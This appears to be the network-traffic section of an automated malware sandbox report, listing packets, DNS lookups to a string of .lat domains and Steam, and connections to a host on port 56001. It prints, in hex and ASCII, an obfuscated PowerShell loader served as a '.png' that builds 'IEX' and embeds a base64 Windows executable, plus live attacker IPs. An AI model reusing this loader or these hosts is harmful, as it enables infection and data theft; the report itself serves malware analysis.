Jan 15, 2025 10:09:10.742662907 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742676973 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742686033 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742692947 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742721081 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742721081 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742753029 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742763996 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742775917 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742786884 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742794037 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742794037 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742827892 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742839098 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742851973 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742865086 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742880106 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742885113 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742932081 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742932081 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.742945910 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742960930 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742974997 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.742996931 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743021965 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743050098 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743062019 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743068933 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743076086 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743088007 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743097067 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743100882 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743108988 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743120909 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743133068 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743139029 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743145943 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743160963 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743164062 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743202925 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.743278980 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743303061 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.743354082 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:10.802483082 CET	80	49707	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:10.944587946 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:11.418114901 CET	49709	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:11.799338102 CET	49708	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:11.872390032 CET	49707	80	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:12.012504101 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.012557983 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:12.012689114 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.014714956 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.014729023 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:12.652141094 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:12.652232885 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.665676117 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.665693998 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:12.666114092 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:12.797435999 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.822175980 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:12.863333941 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234555006 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234586000 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234596968 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234611034 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234639883 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234724998 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.234743118 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.234783888 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.234842062 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.323839903 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.323868990 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.323915958 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.324007034 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.324033022 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.324081898 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.461962938 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.461993933 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:13.462013960 CET	49711	443	192.168.2.5	104.102.49.254
Jan 15, 2025 10:09:13.462019920 CET	443	49711	104.102.49.254	192.168.2.5
Jan 15, 2025 10:09:17.619434118 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:17.624413967 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:17.624509096 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:17.626333952 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:17.631072998 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:17.638324976 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:17.643110037 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:18.333168030 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:18.333194017 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:18.333256006 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:18.340828896 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:18.345633030 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:18.560091019 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:18.688024998 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:20.404202938 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:20.409146070 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:20.409199953 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:20.413985968 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:35.714817047 CET	51338	53	192.168.2.5	162.159.36.2
Jan 15, 2025 10:09:35.719657898 CET	53	51338	162.159.36.2	192.168.2.5
Jan 15, 2025 10:09:35.722264051 CET	51338	53	192.168.2.5	162.159.36.2
Jan 15, 2025 10:09:35.727142096 CET	53	51338	162.159.36.2	192.168.2.5
Jan 15, 2025 10:09:36.185523987 CET	51338	53	192.168.2.5	162.159.36.2
Jan 15, 2025 10:09:36.190669060 CET	53	51338	162.159.36.2	192.168.2.5
Jan 15, 2025 10:09:36.190732002 CET	51338	53	192.168.2.5	162.159.36.2
Jan 15, 2025 10:09:53.749820948 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:53.754789114 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:53.754848957 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:53.759778976 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:54.135910034 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:54.188050032 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:54.303441048 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:54.309675932 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:54.314552069 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:09:54.314623117 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:09:54.319436073 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:27.735605955 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:27.740525007 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:27.740598917 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:27.745465040 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:28.119249105 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:28.172410965 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:28.288661957 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:28.290431976 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:28.295469999 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:28.295536041 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:28.300841093 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:48.735496044 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:48.740717888 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:48.740784883 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:48.745758057 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:49.127960920 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:49.172563076 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:49.305294991 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:49.307492971 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:49.312427998 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:49.312504053 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:49.317301989 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:55.658353090 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:55.663175106 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:55.663264990 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:55.668040037 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:56.042112112 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:56.094346046 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:56.210771084 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:56.212486982 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:56.217428923 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:56.217530966 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:56.222419977 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:59.141661882 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:59.146678925 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:59.146744013 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:59.151537895 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:59.523603916 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:59.578675985 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:59.695359945 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:59.698133945 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:59.703141928 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:10:59.704495907 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:10:59.709379911 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:01.532773018 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:01.537619114 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:01.537736893 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:01.542583942 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:01.913475990 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:01.954361916 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:02.086221933 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:02.090383053 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:02.095427990 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:02.095558882 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:02.100488901 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:05.391619921 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:05.396707058 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:05.398430109 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:05.403285027 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:05.776485920 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:05.828708887 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:05.945557117 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:05.950083971 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:05.955040932 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:05.958458900 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:05.963342905 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:06.892081022 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:06.897064924 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:06.897149086 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:06.901938915 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:07.281488895 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:07.328692913 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:07.445544004 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:07.500593901 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:12.429826975 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:12.434767008 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:12.434839964 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:12.439631939 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:12.821510077 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:12.875658035 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:12.992521048 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:12.993359089 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:12.998217106 CET	56001	49714	92.255.57.112	192.168.2.5
Jan 15, 2025 10:11:12.998282909 CET	49714	56001	192.168.2.5	92.255.57.112
Jan 15, 2025 10:11:13.003675938 CET	56001	49714	92.255.57.112	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 15, 2025 10:09:04.763365030 CET	61558	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:04.776556969 CET	53	61558	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.832910061 CET	50383	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.841844082 CET	53	50383	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.848853111 CET	57853	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.861773968 CET	53	57853	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.867321014 CET	56734	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.876137018 CET	53	56734	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.887607098 CET	64755	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.896608114 CET	53	64755	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.898821115 CET	57974	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.910700083 CET	53	57974	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.913321972 CET	63101	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.922133923 CET	53	63101	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.932327986 CET	58720	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.941157103 CET	53	58720	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.948086977 CET	64529	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.960304022 CET	53	64529	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.980268002 CET	58090	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:11.989171028 CET	53	58090	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:11.995567083 CET	56959	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:12.002445936 CET	53	56959	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:35.710803032 CET	53	56431	162.159.36.2	192.168.2.5
Jan 15, 2025 10:09:36.225261927 CET	54024	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:36.232635021 CET	53	54024	1.1.1.1	192.168.2.5
Jan 15, 2025 10:09:39.168178082 CET	59949	53	192.168.2.5	1.1.1.1
Jan 15, 2025 10:09:39.175405025 CET	53	59949	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 15, 2025 10:09:04.763365030 CET	192.168.2.5	1.1.1.1	0x2389	Standard query (0)	view-reserve.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.832910061 CET	192.168.2.5	1.1.1.1	0xf108	Standard query (0)	curtainykeo.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.848853111 CET	192.168.2.5	1.1.1.1	0x2e88	Standard query (0)	bloodyswif.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.867321014 CET	192.168.2.5	1.1.1.1	0xef5	Standard query (0)	washyceehsu.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.887607098 CET	192.168.2.5	1.1.1.1	0xe721	Standard query (0)	leggelatez.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.898821115 CET	192.168.2.5	1.1.1.1	0xba8b	Standard query (0)	miniatureyu.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.913321972 CET	192.168.2.5	1.1.1.1	0x2a21	Standard query (0)	kickykiduz.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.932327986 CET	192.168.2.5	1.1.1.1	0xe773	Standard query (0)	savorraiykj.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.948086977 CET	192.168.2.5	1.1.1.1	0xdd38	Standard query (0)	shoefeatthe.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.980268002 CET	192.168.2.5	1.1.1.1	0x5043	Standard query (0)	finickypwk.lat	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.995567083 CET	192.168.2.5	1.1.1.1	0x5b32	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:36.225261927 CET	192.168.2.5	1.1.1.1	0x7411	Standard query (0)	198.187.3.20.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 10:09:39.168178082 CET	192.168.2.5	1.1.1.1	0xaccc	Standard query (0)	56.163.245.4.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 15, 2025 10:09:04.776556969 CET	1.1.1.1	192.168.2.5	0x2389	No error (0)	view-reserve.com		92.255.57.120	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.841844082 CET	1.1.1.1	192.168.2.5	0xf108	Name error (3)	curtainykeo.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.861773968 CET	1.1.1.1	192.168.2.5	0x2e88	Name error (3)	bloodyswif.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.876137018 CET	1.1.1.1	192.168.2.5	0xef5	Name error (3)	washyceehsu.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.896608114 CET	1.1.1.1	192.168.2.5	0xe721	Name error (3)	leggelatez.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.910700083 CET	1.1.1.1	192.168.2.5	0xba8b	Name error (3)	miniatureyu.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.922133923 CET	1.1.1.1	192.168.2.5	0x2a21	Name error (3)	kickykiduz.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.941157103 CET	1.1.1.1	192.168.2.5	0xe773	Name error (3)	savorraiykj.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.960304022 CET	1.1.1.1	192.168.2.5	0xdd38	Name error (3)	shoefeatthe.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:11.989171028 CET	1.1.1.1	192.168.2.5	0x5043	Name error (3)	finickypwk.lat	none	none	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:12.002445936 CET	1.1.1.1	192.168.2.5	0x5b32	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:18.847306013 CET	1.1.1.1	192.168.2.5	0x46bf	No error (0)	bg.microsoft.map.fastly.net		199.232.210.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:18.847306013 CET	1.1.1.1	192.168.2.5	0x46bf	No error (0)	bg.microsoft.map.fastly.net		199.232.214.172	A (IP address)	IN (0x0001)	false
Jan 15, 2025 10:09:36.232635021 CET	1.1.1.1	192.168.2.5	0x7411	Name error (3)	198.187.3.20.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Jan 15, 2025 10:09:39.175405025 CET	1.1.1.1	192.168.2.5	0xaccc	Name error (3)	56.163.245.4.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

view-reserve.com

steamcommunity.com

92.255.57.112

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	92.255.57.112	80	6528	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 10:09:09.307121992 CET	70	OUT	GET /1/2.png HTTP/1.1 Host: 92.255.57.112 Connection: Keep-Alive
Jan 15, 2025 10:09:10.015784025 CET	1236	IN	HTTP/1.1 200 OK Content-Type: image/png Last-Modified: Tue, 14 Jan 2025 22:09:21 GMT Accept-Ranges: bytes ETag: "a36a62f6d066db1:0" Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 09:09:09 GMT Content-Length: 526214 Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED] Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACs
